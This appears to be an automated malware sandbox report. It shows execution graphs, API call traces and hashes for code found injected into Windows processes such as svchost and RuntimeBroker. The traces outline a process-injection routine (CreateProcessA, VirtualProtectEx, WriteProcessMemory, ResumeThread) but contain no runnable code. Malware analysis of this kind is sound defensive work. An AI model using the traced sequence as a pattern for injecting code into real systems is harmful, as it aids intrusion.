                                                                                                                                                                                          Execution Coverage:5.1%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:67
                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                          execution_graph 2532 d408d9 2538 d40cc4 2532->2538 2534 d408e5 2541 d40643 2534->2541 2536 d408ef 2549 d4093e 2536->2549 2556 d40c3f GetPEB 2538->2556 2540 d40cc9 2540->2534 2542 d40660 2541->2542 2558 d4067c 2542->2558 2544 d40673 2564 d406c2 2544->2564 2546 d4080f 2546->2536 2547 d406b9 2547->2546 2568 d40811 2547->2568 2550 d40cc4 GetPEB 2549->2550 2552 d4094a 2550->2552 2551 d40af1 2551->2536 2552->2551 2585 d409d9 2552->2585 2555 d409d2 2555->2551 2589 d40af3 2555->2589 2557 d40c4b 2556->2557 2557->2540 2557->2557 2559 d40681 2558->2559 2560 d406c2 GetPEB 2559->2560 2562 d406b9 2560->2562 2561 d4080f 2561->2544 2562->2561 2563 d40811 GetPEB 2562->2563 2563->2561 2565 d406c7 2564->2565 2566 d4080f 2565->2566 2567 d40811 GetPEB 2565->2567 2566->2547 2567->2566 2569 d40840 2568->2569 2570 d40863 2569->2570 2572 d408b9 2569->2572 2573 d40866 2569->2573 2570->2573 2574 d40cc4 GetPEB 2570->2574 2579 d408d9 2572->2579 2573->2546 2575 d408e5 2574->2575 2576 d40643 GetPEB 2575->2576 2577 d408ef 2576->2577 2578 d4093e GetPEB 2577->2578 2578->2577 2580 d40cc4 GetPEB 2579->2580 2581 d408e5 2580->2581 2582 d40643 GetPEB 2581->2582 2583 d408ef 2582->2583 2584 d4093e GetPEB 2583->2584 2584->2583 2588 d409de 2585->2588 2586 d40af3 GetPEB 2587 d40af1 2586->2587 2587->2555 2588->2586 2588->2587 2591 d40b01 2589->2591 2592 d40cc4 GetPEB 2591->2592 2593 d40b0d 2592->2593 2598 d40b27 2593->2598 2595 d40b20 2602 d40b65 2595->2602 2599 d40b2c 2598->2599 2600 d40b65 GetPEB 2599->2600 2601 d40b57 2599->2601 2600->2601 2601->2595 2606 d40b6a 2602->2606 2608 d408b3 2606->2608 2609 d408b9 2608->2609 2610 d408d9 GetPEB 2609->2610 2610->2609 2611 d40b6b 2612 d40b7d 2611->2612 2613 d408b3 GetPEB 2612->2613 2614 d40bb1 2613->2614 2615 d40c3f GetPEB 2614->2615 2616 d40bb6 2615->2616

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00D40811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000008.00000002.2888693305.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_d40000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 08b2109dcbf42d691bd0579a811ffb356924513e44b27f1ccfa88f3ac837c6f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: A631C672410244AFEB017B709D86ABA3FACEF11310F440165BE85DA0A6EA7449A5CAF5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:5.1%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:70
                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                          execution_graph 2504 b508d9 2510 b50cc4 2504->2510 2506 b508e5 2513 b50643 2506->2513 2508 b508ef 2521 b5093e 2508->2521 2528 b50c3f GetPEB 2510->2528 2512 b50cc9 2512->2506 2514 b50660 2513->2514 2530 b5067c 2514->2530 2516 b50673 2536 b506c2 2516->2536 2518 b5080f 2518->2508 2519 b506b9 2519->2518 2540 b50811 2519->2540 2522 b50cc4 GetPEB 2521->2522 2524 b5094a 2522->2524 2523 b50af1 2523->2508 2524->2523 2560 b509d9 2524->2560 2527 b509d2 2527->2523 2564 b50af3 2527->2564 2529 b50c4b 2528->2529 2529->2512 2529->2529 2531 b50681 2530->2531 2532 b506c2 GetPEB 2531->2532 2534 b506b9 2532->2534 2533 b5080f 2533->2516 2534->2533 2535 b50811 GetPEB 2534->2535 2535->2533 2537 b506c7 2536->2537 2538 b5080f 2537->2538 2539 b50811 GetPEB 2537->2539 2538->2519 2539->2538 2551 b5086e 2540->2551 2542 b50840 2544 b508d9 2542->2544 2546 b50866 2542->2546 2545 b50cc4 GetPEB 2544->2545 2547 b508e5 2545->2547 2546->2518 2554 b508d9 2546->2554 2548 b50643 GetPEB 2547->2548 2549 b508ef 2548->2549 2550 b5093e GetPEB 2549->2550 2550->2549 2552 b50873 2551->2552 2552->2542 2553 b508d9 GetPEB 2552->2553 2553->2552 2555 b50cc4 GetPEB 2554->2555 2556 b508e5 2555->2556 2557 b50643 GetPEB 2556->2557 2558 b508ef 2557->2558 2559 b5093e GetPEB 2558->2559 2559->2558 2563 b509de 2560->2563 2561 b50af3 GetPEB 2562 b50af1 2561->2562 2562->2527 2563->2561 2563->2562 2566 b50b01 2564->2566 2567 b50cc4 GetPEB 2566->2567 2568 b50b0d 2567->2568 2573 b50b27 2568->2573 2570 b50b20 2572 b50b57 2570->2572 2577 b50b65 2570->2577 2574 b50b2c 2573->2574 2575 b50b65 GetPEB 2574->2575 2576 b50b57 2575->2576 2576->2570 2581 b50b6a 2577->2581 2583 b508b3 2581->2583 2584 b508b9 2583->2584 2585 b508d9 GetPEB 2584->2585 2585->2584 2586 b50b6b 2587 b50b7d 2586->2587 2588 b508b3 GetPEB 2587->2588 2589 b50bb1 2588->2589 2590 b50c3f GetPEB 2589->2590 2591 b50bb6 2590->2591

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00B50811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2888642573.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_b50000_StartMenuExperienceHost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: d0a9b7ccad2424afbd224703fef996352ea6b7a6d1d9ad784538435e3ee26c62
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31D4720202046FEB017F709D86FBA3BECEF11312F0005E5BD95DA0A6EA744D69CAB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:7.4%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:80
                                                                                                                                                                                          Total number of Limit Nodes:8
                                                                                                                                                                                          execution_graph 2509 1108d9 2517 110cc4 2509->2517 2511 1108e5 2520 110643 2511->2520 2513 110939 2528 11093e 2513->2528 2515 1108ef 2515->2513 2516 11091f SleepEx RtlExitUserThread 2515->2516 2516->2513 2535 110c3f GetPEB 2517->2535 2519 110cc9 2519->2511 2521 110660 2520->2521 2537 11067c 2521->2537 2523 110673 2543 1106c2 2523->2543 2525 11080f 2525->2515 2526 1106b9 2526->2525 2547 110811 2526->2547 2529 110cc4 GetPEB 2528->2529 2531 11094a 2529->2531 2530 110af1 2530->2513 2531->2530 2567 1109d9 2531->2567 2534 1109d2 2534->2530 2571 110af3 2534->2571 2536 110c4b 2535->2536 2536->2519 2536->2536 2538 110681 2537->2538 2539 1106c2 7 API calls 2538->2539 2541 1106b9 2539->2541 2540 11080f 2540->2523 2541->2540 2542 110811 7 API calls 2541->2542 2542->2540 2545 1106c7 2543->2545 2544 11080f 2544->2526 2545->2544 2546 110811 7 API calls 2545->2546 2546->2544 2549 110840 2547->2549 2548 110863 2551 110866 2548->2551 2552 110cc4 GetPEB 2548->2552 2549->2548 2549->2551 2559 1108d9 2549->2559 2551->2525 2553 1108e5 2552->2553 2554 110643 5 API calls 2553->2554 2557 1108ef 2554->2557 2555 110939 2556 11093e 5 API calls 2555->2556 2556->2555 2557->2555 2558 11091f SleepEx RtlExitUserThread 2557->2558 2558->2555 2560 110cc4 GetPEB 2559->2560 2561 1108e5 2560->2561 2562 110643 5 API calls 2561->2562 2565 1108ef 2562->2565 2563 110939 2564 11093e 5 API calls 2563->2564 2564->2563 2565->2563 2566 11091f SleepEx RtlExitUserThread 2565->2566 2566->2563 2570 1109de 2567->2570 2568 110af3 7 API calls 2569 110af1 2568->2569 2569->2534 2570->2568 2570->2569 2573 110b01 2571->2573 2574 110cc4 GetPEB 2573->2574 2575 110b0d 2574->2575 2580 110b27 2575->2580 2577 110b20 2584 110b65 2577->2584 2581 110b2c 2580->2581 2582 110b65 7 API calls 2581->2582 2583 110b57 2581->2583 2582->2583 2583->2577 2588 110b6a 2584->2588 2590 1108b3 2588->2590 2591 1108b9 2590->2591 2592 1108d9 5 API calls 2591->2592 2593 1108d5 2592->2593 2594 110cc4 GetPEB 2593->2594 2595 1108e5 2594->2595 2596 110643 5 API calls 2595->2596 2599 1108ef 2596->2599 2597 110939 2598 11093e 5 API calls 2597->2598 2598->2597 2599->2597 2600 11091f SleepEx RtlExitUserThread 2599->2600 2600->2597 2601 110b6b 2602 110b7d 2601->2602 2603 1108b3 7 API calls 2602->2603 2604 110bb1 2603->2604 2605 110c3f GetPEB 2604->2605 2606 110bb6 2605->2606

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00110811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2886556042.0000000000110000.00000040.00000001.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_110000_RuntimeBroker.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: e0c6e7e9a2d7599d1d0e12609d6689695a60be68487ad526544be4dcdcbfa815
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B31D6728042047FEB0A7B709D46AFA7B6CEF15300F000175BD85DA0A2EBB449D5CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:6.3%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:31.4%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:462
                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                          execution_graph 5759 1c495d 5760 1c4970 5759->5760 5761 1c49ae CreateEventA 5760->5761 5763 1c4a63 5760->5763 5762 1c49d1 5761->5762 5762->5763 5764 1c4d53 WaitForSingleObject 5762->5764 5764->5762 5897 1c3e9e 5898 1c3ea1 5897->5898 5901 1c3ec3 5898->5901 5902 1c3653 5901->5902 5903 1c3ec8 LoadLibraryA 5902->5903 5904 1c3eee 5903->5904 5906 1c3ed2 5903->5906 5905 1c3f0d 7 API calls 5904->5905 5909 1c3f03 5905->5909 5907 1c409a 3 API calls 5906->5907 5908 1c3ebd 5907->5908 5910 1c3f3b 5909->5910 5911 1c3f2b GetModuleHandleA 5909->5911 5913 1c3f46 Sleep 5910->5913 5912 1c401b 3 API calls 5911->5912 5914 1c3f39 5912->5914 5915 1c3f78 5913->5915 5914->5908 5916 1c3f56 Sleep 5915->5916 5917 1c3f78 5916->5917 5918 1c3f66 Sleep 5917->5918 5918->5908 5918->5914 5481 850000 VirtualProtect 5482 85034e 5481->5482 5483 8506d0 VirtualProtect 5482->5483 5484 850528 VirtualProtect 5482->5484 5484->5482 5919 1c3e9a 5920 1c3653 5919->5920 5921 1c3e9f GetProcAddress 5920->5921 5922 1c3eaa 5921->5922 5923 1c3ed4 5921->5923 5924 1c3ebd 5922->5924 5925 1c3ec3 12 API calls 5922->5925 5926 1c409a 3 API calls 5923->5926 5925->5924 5927 1c3ee9 5926->5927 5644 2383f31 5645 2383f36 5644->5645 5646 2383f4f GetModuleHandleA 5645->5646 5648 2383f5f 5645->5648 5655 238403f 5646->5655 5650 2383f6a Sleep 5648->5650 5649 2383f5d 5651 2383f9c 5650->5651 5652 2383f7a Sleep 5651->5652 5653 2383f9c 5652->5653 5654 2383f8a Sleep 5653->5654 5654->5649 5656 2384052 5655->5656 5657 23840ba 5656->5657 5659 23840be 5656->5659 5657->5649 5664 23839d7 RtlInitializeCriticalSection 5659->5664 5663 23840c8 5663->5657 5665 23839e7 VirtualAlloc 5664->5665 5665->5665 5666 23839ff 5665->5666 5667 238382b VirtualAlloc 5666->5667 5667->5667 5668 2383843 CreateThread 5667->5668 5668->5663 5765 2383d6a 5766 2383d6f 5765->5766 5767 23839d7 2 API calls 5766->5767 5768 2383d8a 5767->5768 5769 238382b 2 API calls 5768->5769 5770 2383d8f 5769->5770 5669 2383f2c 5670 2383f5d 5669->5670 5671 2383f31 5669->5671 5672 2383f5f 5671->5672 5673 2383f4f GetModuleHandleA 5671->5673 5675 2383f6a Sleep 5672->5675 5674 238403f 4 API calls 5673->5674 5674->5670 5676 2383f9c 5675->5676 5677 2383f7a Sleep 5676->5677 5678 2383f9c 5677->5678 5679 2383f8a Sleep 5678->5679 5679->5670 5771 1c3d46 5772 1c3653 5771->5772 5773 1c3d4b LoadLibraryA 5772->5773 5774 1c3d61 5773->5774 5792 1c3d86 5774->5792 5777 1c3da1 5778 1c1345 3 API calls 5777->5778 5779 1c3dba 5778->5779 5780 1c1345 3 API calls 5779->5780 5781 1c3dd3 5780->5781 5782 1c1345 3 API calls 5781->5782 5783 1c3dec 5782->5783 5784 1c1345 3 API calls 5783->5784 5785 1c3e05 5784->5785 5786 1c1345 3 API calls 5785->5786 5787 1c3e1e 5786->5787 5788 1c1345 3 API calls 5787->5788 5789 1c3e37 5788->5789 5790 1c1345 3 API calls 5789->5790 5791 1c3e50 5790->5791 5793 1c3653 5792->5793 5794 1c3d8b LoadLibraryA 5793->5794 5795 1c3da1 5794->5795 5796 1c1345 3 API calls 5795->5796 5797 1c3dba 5796->5797 5798 1c1345 3 API calls 5797->5798 5799 1c3dd3 5798->5799 5800 1c1345 3 API calls 5799->5800 5801 1c3dec 5800->5801 5802 1c1345 3 API calls 5801->5802 5803 1c3e05 5802->5803 5804 1c1345 3 API calls 5803->5804 5805 1c3e1e 5804->5805 5806 1c1345 3 API calls 5805->5806 5807 1c3e37 5806->5807 5808 1c1345 3 API calls 5807->5808 5809 1c3d7e LoadLibraryA 5808->5809 5809->5777 5974 1c34c6 lstrlen 5977 1c276c 5974->5977 5976 1c34df VirtualFree CloseHandle 5978 1c277d 5977->5978 5978->5976 5979 1c31c6 5980 1c31cb 5979->5980 5981 1c31e9 lstrcat 5980->5981 5982 1c31f6 5981->5982 5983 1c321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle 5982->5983 5984 1c3276 5982->5984 5983->5984 5602 1c3ec3 5603 1c3653 5602->5603 5604 1c3ec8 LoadLibraryA 5603->5604 5605 1c3eee 5604->5605 5607 1c3ed2 5604->5607 5620 1c3f0d 5605->5620 5632 1c409a 5607->5632 5609 1c3ee9 5610 1c3f03 5611 1c3f3b 5610->5611 5612 1c3f2b GetModuleHandleA 5610->5612 5614 1c3f46 Sleep 5611->5614 5640 1c401b 5612->5640 5616 1c3f78 5614->5616 5615 1c3f39 5615->5609 5617 1c3f56 Sleep 5616->5617 5618 1c3f78 5617->5618 5619 1c3f66 Sleep 5618->5619 5619->5609 5619->5615 5621 1c3f12 5620->5621 5622 1c3f2b GetModuleHandleA 5621->5622 5623 1c3f3b 5621->5623 5624 1c401b 3 API calls 5622->5624 5625 1c3f46 Sleep 5623->5625 5626 1c3f39 5624->5626 5627 1c3f78 5625->5627 5628 1c3f76 5626->5628 5629 1c3f56 Sleep 5627->5629 5628->5610 5630 1c3f78 5629->5630 5631 1c3f66 Sleep 5630->5631 5631->5626 5631->5628 5633 1c409f 5632->5633 5634 1c1345 3 API calls 5633->5634 5635 1c40bd 5634->5635 5636 1c1345 3 API calls 5635->5636 5637 1c40d6 5636->5637 5638 1c1345 3 API calls 5637->5638 5639 1c40ef 5638->5639 5639->5609 5641 1c402e 5640->5641 5642 1c4096 5641->5642 5643 1c409a 3 API calls 5641->5643 5642->5615 5643->5642 5928 23838a7 5929 23838ac 5928->5929 5932 23838f2 5929->5932 5936 238260c 5932->5936 5937 238261a 5936->5937 5938 1c3883 5939 1c3888 5938->5939 5942 1c38ce 5939->5942 5941 1c3894 5946 1c25e8 5942->5946 5944 1c38e8 lstrcat 5945 1c38fe 5944->5945 5945->5941 5947 1c25f6 5946->5947 5947->5944 5307 1c093e 5328 1c0cc4 5307->5328 5309 1c094a 5331 1c14bc 5309->5331 5311 1c094f 5312 1c0954 Sleep RtlExitUserThread OpenMutexA 5311->5312 5313 1c098f GetStartupInfoA 5312->5313 5314 1c0af1 5312->5314 5346 1c09d9 5313->5346 5316 1c0a3d DuplicateHandle 5317 1c0aec 5316->5317 5318 1c0a82 WriteProcessMemory 5316->5318 5360 1c0af3 5317->5360 5318->5317 5320 1c0ab0 ResumeThread 5318->5320 5319 1c0a3c 5319->5316 5322 1c0ac1 Sleep OpenMutexA 5320->5322 5322->5314 5325 1c0ae7 5322->5325 5323 1c09d2 5323->5316 5323->5319 5324 1c09de CreateProcessA 5323->5324 5324->5317 5326 1c09ee GetThreadContext 5324->5326 5325->5317 5325->5322 5326->5317 5327 1c0a16 VirtualProtectEx 5326->5327 5327->5317 5327->5319 5362 1c0c3f GetPEB 5328->5362 5330 1c0cc9 5330->5309 5364 1c14de 5331->5364 5333 1c14d8 5378 1c1345 5333->5378 5336 1c1345 3 API calls 5337 1c152b 5336->5337 5338 1c1345 3 API calls 5337->5338 5339 1c1544 5338->5339 5340 1c1345 3 API calls 5339->5340 5341 1c155d 5340->5341 5342 1c1345 3 API calls 5341->5342 5343 1c1576 5342->5343 5344 1c1345 3 API calls 5343->5344 5345 1c158f 5344->5345 5345->5311 5385 1c3653 5346->5385 5348 1c09de CreateProcessA 5349 1c0aec 5348->5349 5350 1c09ee GetThreadContext 5348->5350 5352 1c0af3 21 API calls 5349->5352 5350->5349 5351 1c0a16 VirtualProtectEx 5350->5351 5351->5349 5353 1c0a3c DuplicateHandle 5351->5353 5354 1c0af1 5352->5354 5353->5349 5356 1c0a82 WriteProcessMemory 5353->5356 5354->5323 5356->5349 5357 1c0ab0 ResumeThread 5356->5357 5358 1c0ac1 Sleep OpenMutexA 5357->5358 5358->5354 5359 1c0ae7 5358->5359 5359->5349 5359->5358 5387 1c0b01 5360->5387 5363 1c0c4b 5362->5363 5363->5330 5363->5363 5365 1c14e3 5364->5365 5366 1c1345 3 API calls 5365->5366 5367 1c1512 5366->5367 5368 1c1345 3 API calls 5367->5368 5369 1c152b 5368->5369 5370 1c1345 3 API calls 5369->5370 5371 1c1544 5370->5371 5372 1c1345 3 API calls 5371->5372 5373 1c155d 5372->5373 5374 1c1345 3 API calls 5373->5374 5375 1c1576 5374->5375 5376 1c1345 3 API calls 5375->5376 5377 1c158f 5376->5377 5377->5333 5379 1c1358 5378->5379 5380 1c13eb 5378->5380 5379->5380 5381 1c1364 VirtualProtect 5379->5381 5380->5336 5381->5380 5382 1c137c VirtualAlloc 5381->5382 5382->5382 5383 1c1391 5382->5383 5384 1c13ad VirtualProtect 5383->5384 5384->5380 5386 1c3665 5385->5386 5386->5348 5386->5386 5388 1c0cc4 GetPEB 5387->5388 5389 1c0b0d 5388->5389 5394 1c0b27 5389->5394 5391 1c0b20 5400 1c0b65 5391->5400 5395 1c3653 5394->5395 5396 1c0b2c LoadLibraryA 5395->5396 5397 1c0b42 5396->5397 5398 1c0b65 28 API calls 5397->5398 5399 1c0b57 5397->5399 5398->5399 5399->5391 5401 1c3653 5400->5401 5402 1c0b6a FindWindowA 5401->5402 5403 1c0bac 5402->5403 5404 1c0b74 GetWindowThreadProcessId OpenProcess 5402->5404 5411 1c08b3 5403->5411 5404->5403 5408 1c0b8e 5404->5408 5408->5403 5409 1c0ba4 ExitProcess 5408->5409 5414 1c08b9 5411->5414 5422 1c08d9 5414->5422 5423 1c0cc4 GetPEB 5422->5423 5424 1c08e5 5423->5424 5425 1c14bc 3 API calls 5424->5425 5426 1c08ea 5425->5426 5430 1c0643 5426->5430 5429 1c08ef 5438 1c093e 5429->5438 5431 1c0660 5430->5431 5459 1c067c 5431->5459 5433 1c0673 5465 1c06c2 5433->5465 5435 1c080f 5435->5429 5436 1c06b9 5436->5435 5469 1c0811 5436->5469 5439 1c0cc4 GetPEB 5438->5439 5440 1c094a 5439->5440 5441 1c14bc 3 API calls 5440->5441 5442 1c094f 5441->5442 5443 1c0954 Sleep RtlExitUserThread OpenMutexA 5442->5443 5444 1c098f GetStartupInfoA 5443->5444 5445 1c0af1 5443->5445 5446 1c09d9 17 API calls 5444->5446 5445->5429 5454 1c09d2 5446->5454 5447 1c0a3d DuplicateHandle 5448 1c0aec 5447->5448 5449 1c0a82 WriteProcessMemory 5447->5449 5452 1c0af3 17 API calls 5448->5452 5449->5448 5451 1c0ab0 ResumeThread 5449->5451 5450 1c0a3c 5450->5447 5453 1c0ac1 Sleep OpenMutexA 5451->5453 5452->5445 5453->5445 5456 1c0ae7 5453->5456 5454->5447 5454->5450 5455 1c09de CreateProcessA 5454->5455 5455->5448 5457 1c09ee GetThreadContext 5455->5457 5456->5448 5456->5453 5457->5448 5458 1c0a16 VirtualProtectEx 5457->5458 5458->5448 5458->5450 5460 1c0681 5459->5460 5461 1c06c2 29 API calls 5460->5461 5463 1c06b9 5461->5463 5462 1c080f 5462->5433 5463->5462 5464 1c0811 29 API calls 5463->5464 5464->5462 5467 1c06c7 5465->5467 5466 1c080f 5466->5436 5467->5466 5468 1c0811 29 API calls 5467->5468 5468->5466 5470 1c0840 5469->5470 5471 1c0863 5470->5471 5472 1c08d9 29 API calls 5470->5472 5473 1c0866 5470->5473 5471->5473 5474 1c0cc4 GetPEB 5471->5474 5472->5471 5473->5435 5475 1c08e5 5474->5475 5476 1c14bc 3 API calls 5475->5476 5477 1c08ea 5476->5477 5478 1c0643 29 API calls 5477->5478 5480 1c08ef 5478->5480 5479 1c093e 29 API calls 5479->5480 5480->5479 5680 1c2f3f 5681 1c2f44 5680->5681 5682 1c2f4a lstrlen 5681->5682 5683 1c2f61 5682->5683 5684 1c292d 5685 1c3653 5684->5685 5686 1c2932 LoadLibraryA 5685->5686 5687 1c2948 5686->5687 5688 1c2961 VirtualAlloc 5687->5688 5688->5688 5689 1c2979 5688->5689 5707 1c29a6 5689->5707 5708 1c3653 5707->5708 5709 1c29ab lstrcat 5708->5709 5710 1c29c1 5709->5710 5724 1c29dd 5710->5724 5725 1c3653 5724->5725 5726 1c29e2 lstrcat 5725->5726 5727 1c29f8 5726->5727 5737 1c2a14 5727->5737 5738 1c3653 5737->5738 5739 1c2a19 lstrcat 5738->5739 5744 1c2a20 5739->5744 5741 1c2a8a DeleteFileA 5741->5744 5742 1c2ace DeleteFileA 5742->5744 5743 1c2b34 Sleep 5743->5744 5744->5741 5744->5742 5744->5743 5745 1c2b1e DeleteFileA 5744->5745 5746 1c2b4d 5744->5746 5745->5743 5747 1c2b5e 5746->5747 5748 1c2c41 Sleep 5747->5748 5750 1c2cf7 5747->5750 5751 1c2c99 5747->5751 5748->5747 5748->5748 5750->5744 5754 1c2b5e 5751->5754 5752 1c2cf7 5752->5747 5753 1c2c41 Sleep 5753->5753 5753->5754 5754->5751 5754->5752 5754->5753 5889 1c0b6b GetWindowThreadProcessId OpenProcess 5890 1c0bac 5889->5890 5893 1c0b8e 5889->5893 5891 1c08b3 29 API calls 5890->5891 5892 1c0bb1 5891->5892 5894 1c0c3f GetPEB 5892->5894 5893->5890 5895 1c0ba4 ExitProcess 5893->5895 5896 1c0bb6 5894->5896 5948 2380b8f 5949 2380ba1 OpenProcess 5948->5949 5950 2380bd0 5949->5950 5953 2380bb2 5949->5953 5951 23808d7 3 API calls 5950->5951 5952 2380bd5 5951->5952 5954 2380c63 GetPEB 5952->5954 5953->5950 5955 2380bc8 ExitProcess 5953->5955 5956 2380bda 5954->5956 5485 2380000 5487 2380005 5485->5487 5502 2380ce8 5487->5502 5489 2380011 5505 23833ca 5489->5505 5491 2380016 5509 238098b OpenMutexA 5491->5509 5494 238038f 5495 2380697 5531 23806e6 5495->5531 5496 238002e 5496->5494 5496->5495 5525 23806a0 5496->5525 5499 2380833 5500 23806dd 5500->5499 5535 2380835 5500->5535 5543 2380c63 GetPEB 5502->5543 5504 2380ced 5504->5489 5506 23833ea 5505->5506 5545 2383409 GetVolumeInformationA 5506->5545 5508 2383405 5508->5491 5510 23809b3 GetStartupInfoA 5509->5510 5511 238001b ExitProcess 5509->5511 5547 23809fd 5510->5547 5511->5496 5513 2380a60 5513->5511 5514 23809f6 5514->5513 5515 2380a02 CreateProcessA 5514->5515 5516 2380b10 5515->5516 5517 2380a12 GetThreadContext 5515->5517 5516->5511 5560 2380b17 5516->5560 5517->5516 5518 2380a3a VirtualProtectEx 5517->5518 5518->5516 5520 2380a65 DuplicateHandle 5518->5520 5520->5516 5521 2380aa6 WriteProcessMemory 5520->5521 5521->5516 5522 2380ad4 ResumeThread 5521->5522 5523 2380ae5 Sleep OpenMutexA 5522->5523 5523->5511 5524 2380b0b 5523->5524 5524->5516 5524->5523 5526 23806a5 5525->5526 5527 23806e6 3 API calls 5526->5527 5529 23806dd 5527->5529 5528 2380833 5528->5495 5529->5528 5530 2380835 3 API calls 5529->5530 5530->5528 5533 23806eb 5531->5533 5532 2380833 5532->5500 5533->5532 5534 2380835 3 API calls 5533->5534 5534->5532 5536 2380864 5535->5536 5537 2380887 5536->5537 5538 23808fd 3 API calls 5536->5538 5539 238088a 5536->5539 5537->5539 5540 2380ce8 GetPEB 5537->5540 5538->5537 5539->5499 5542 2380909 5540->5542 5541 2380962 3 API calls 5541->5542 5542->5541 5544 2380c6f 5543->5544 5544->5504 5544->5544 5546 238342b 5545->5546 5546->5508 5562 2383677 5547->5562 5549 2380a02 CreateProcessA 5550 2380b10 5549->5550 5551 2380a12 GetThreadContext 5549->5551 5553 2380b15 5550->5553 5554 2380b17 6 API calls 5550->5554 5551->5550 5552 2380a3a VirtualProtectEx 5551->5552 5552->5550 5555 2380a65 DuplicateHandle 5552->5555 5553->5514 5554->5553 5555->5550 5556 2380aa6 WriteProcessMemory 5555->5556 5556->5550 5557 2380ad4 ResumeThread 5556->5557 5558 2380ae5 Sleep OpenMutexA 5557->5558 5558->5553 5559 2380b0b 5558->5559 5559->5550 5559->5558 5564 2380b25 5560->5564 5563 2383689 5562->5563 5563->5549 5563->5563 5565 2380ce8 GetPEB 5564->5565 5566 2380b31 5565->5566 5571 2380b4b 5566->5571 5568 2380b44 5577 2380b89 5568->5577 5572 2383677 5571->5572 5573 2380b50 LoadLibraryA 5572->5573 5574 2380b66 5573->5574 5575 2380b89 5 API calls 5574->5575 5576 2380b7b 5574->5576 5575->5576 5576->5568 5578 2380b8e 5577->5578 5579 2380bd0 5578->5579 5581 2380ba1 OpenProcess 5578->5581 5587 23808d7 5579->5587 5581->5579 5584 2380bb2 5581->5584 5584->5579 5585 2380bc8 ExitProcess 5584->5585 5588 23808dd 5587->5588 5594 23808fd 5588->5594 5595 2380ce8 GetPEB 5594->5595 5597 2380909 5595->5597 5598 2380962 5597->5598 5599 2380ce8 GetPEB 5598->5599 5600 238096e 5599->5600 5601 2380978 Sleep RtlExitUserThread 5600->5601 5755 1c4d25 5756 1c4d4e 5755->5756 5757 1c4d32 5755->5757 5757->5756 5758 1c4d44 SetEvent 5757->5758 5758->5756

                                                                                                                                                                                          Executed Functions

